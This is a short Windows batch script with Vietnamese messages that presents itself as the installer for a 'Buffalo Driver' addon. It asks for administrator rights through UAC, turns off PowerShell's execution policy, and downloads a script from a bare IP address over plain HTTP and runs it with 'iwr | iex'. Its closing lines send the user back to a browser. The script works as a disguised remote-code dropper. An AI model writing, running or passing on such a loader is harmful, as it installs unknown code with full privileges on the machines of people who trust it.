@echo off
chcp 65001 >nul
title Cai Addon Buffalo Driver
echo === Cai dat Addon Buffalo Driver (build 28 / agent 46) ===
echo.
:: Tu nang quyen Admin (mot lan UAC) — can de quet/xuat driver day du
net session >nul 2>&1
if not %errorLevel%==0 (
  echo Can quyen Administrator — hay bam Yes tren hop thoai UAC...
  powershell -NoProfile -ExecutionPolicy Bypass -Command "Start-Process -FilePath '%~f0' -Verb RunAs"
  exit /b
)
echo Dang tai va cai addon moi nhat tu server (quyen Admin)...
powershell -NoProfile -ExecutionPolicy Bypass -Command "iwr 'http://14.241.37.81/drivers/public/api/agent/script/setup?v=10&agent=46&build=28' -UseBasicParsing | iex"
echo.
echo Xong. Dong cua so nay, quay lai trinh duyet, bam Ctrl+F5.
pause
